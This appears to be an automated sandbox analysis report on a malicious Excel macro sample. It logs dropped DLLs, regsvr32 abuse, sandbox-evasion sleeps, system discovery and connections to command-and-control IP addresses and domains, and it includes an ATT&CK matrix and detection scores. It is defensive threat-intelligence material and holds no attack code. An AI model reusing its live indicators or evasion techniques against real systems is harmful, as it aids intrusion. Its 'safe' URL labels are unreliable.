Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\u8wa3gh[1].zip			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\dvnrlttv[1].zip			Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -384000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -664000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -700000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -315000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -648000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -414000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -684000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -356000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -912000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -831000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -610000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -402000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -241000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -242000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -282000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -249000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -157000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -145000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -544000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -323000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -381000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -158000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -297000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -163000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -592000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -142000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -620000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -350000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -644000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -716000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -308000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -327000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -173000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -438000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -299000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -174000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -279000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -680000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -302000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -330000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -156000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -676000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -396000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -357000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -270000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -352000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -570000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -576000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -620000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -351000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -625000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -536000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -126000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -280000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -306000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -259000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -336000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -248000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -501000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -429000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -318000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -124000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -139000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -346000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -165000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -320000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -354000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -308000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -172000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -262000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -340000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -298000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -247000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -294000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -293000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -274000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -516000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -153000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -295000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -270000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -342000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -278000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -266000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -284000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -272000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -243000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -324000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -283000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -282000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -137000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -316000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -352000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -333000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4824	Thread sleep time: -144000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -336000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -396000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -292000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -343000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -510000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -172000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -126000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -329000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -246000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -308000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -166000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -873000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -131000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -636000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -152000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -268000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -288000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -286000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -335000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -276000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -163000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -176000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -319000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -310000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -426000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -294000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -324000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -342000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -167000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -316000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -352000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -161000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -285000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -354000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -150000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -317000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -342000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -125000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -149000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -357000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -519000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -157000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -274000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -282000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -135000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -290000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -165000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -241000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -301000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -316000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -256000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -592000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -136000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -169000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -275000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -179000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -251000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -441000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -174000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -288000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -153000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -287000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -121000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -151000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -256000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -127000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -349000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -124000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -141000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -356000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3124	Thread sleep time: -331000s >= -30000s

Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 16_2_00B93930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,

Source: regsvr32.exe, 00000010.00000002.982166126.0000000000859000.00000004.00000020.sdmp, regsvr32.exe, 00000012.00000003.980149370.000000000319B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: regsvr32.exe, 00000010.00000002.982129885.000000000080A000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW(
Source: regsvr32.exe, 00000012.00000002.992709118.000000000314A000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWH

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 16_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B97A60 RtlAddVectoredExceptionHandler,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FD7A60 RtlAddVectoredExceptionHandler,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 80.86.91.27 236
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 5.100.228.233 61
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 46.105.131.65 232
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 77.220.64.37 187

Source: regsvr32.exe, 00000010.00000002.989036375.0000000002D60000.00000002.00000001.sdmp, regsvr32.exe, 00000012.00000002.992808368.00000000035D0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: regsvr32.exe, 00000010.00000002.989036375.0000000002D60000.00000002.00000001.sdmp, regsvr32.exe, 00000012.00000002.992808368.00000000035D0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000010.00000002.989036375.0000000002D60000.00000002.00000001.sdmp, regsvr32.exe, 00000012.00000002.992808368.00000000035D0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: regsvr32.exe, 00000010.00000002.989036375.0000000002D60000.00000002.00000001.sdmp, regsvr32.exe, 00000012.00000002.992808368.00000000035D0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 16_2_00B92980 GetUserNameW,

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting22	DLL Side-Loading1	DLL Side-Loading1	Scripting22	OS Credential Dumping	Account Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Obfuscated Files or Information1	LSASS Memory	File and Directory Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution43	Logon Script (Windows)	Process Injection12	DLL Side-Loading1	Security Account Manager	System Information Discovery14	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Extra Window Memory Injection1	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading11	LSA Secrets	Security Software Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion1	Cached Domain Credentials	Virtualization/Sandbox Evasion1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection12	DCSync	Process Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Regsvr321	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	System Network Configuration Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
sample20210111-01.xlsm	27%	Virustotal		Browse
sample20210111-01.xlsm	8%	Metadefender		Browse
sample20210111-01.xlsm	32%	ReversingLabs	Script-Macro.Trojan.Woreflint

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\xnaitann.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\u8wa3gh[1].zip	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\dvnrlttv[1].zip	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\dunjzsby.dll	100%	Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
osmosisecuador.com	5%	Virustotal	Browse
bulksms.interweblimited.com	2%	Virustotal	Browse
sistacweb.com	4%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://5.100.228.233:3389/	0%	Avira URL Cloud	safe
https://80.86.91.27:3308/P	0%	Avira URL Cloud	safe
https://77.220.64.37/105.131.65/pe	0%	Avira URL Cloud	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://5.100.228.233:3389/(	0%	Avira URL Cloud	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://80.86.91.27:3308/D	0%	Avira URL Cloud	safe
https://80.86.91.27:3308/H	0%	Avira URL Cloud	safe
https://46.105.131.65:1512/	0%	Avira URL Cloud	safe
https://77.220.64.37/si(	0%	Avira URL Cloud	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://5.100.228.233:3389/8	0%	Avira URL Cloud	safe
https://5.100.228.233:3389/soft	0%	Avira URL Cloud	safe
https://77.220.64.37/si3	0%	Avira URL Cloud	safe
https://80.86.91.27:3308/0	0%	Avira URL Cloud	safe
https://80.86.91.27:3308//	0%	Avira URL Cloud	safe
https://80.86.91.27:3308/rX	0%	Avira URL Cloud	safe
https://80.86.91.27:3308/3	0%	Avira URL Cloud	safe
https://77.220.64.37/si=	0%	Avira URL Cloud	safe
https://5.100.228.233:3389/0	0%	Avira URL Cloud	safe
https://77.220.64.37/.(	0%	Avira URL Cloud	safe
https://80.86.91.27:3308/8	0%	Avira URL Cloud	safe
https://80.86.91.27:3308//x	0%	Avira URL Cloud	safe
https://5.100.228.233:3389/H	0%	Avira URL Cloud	safe
https://5.100.228.233:3389/D	0%	Avira URL Cloud	safe
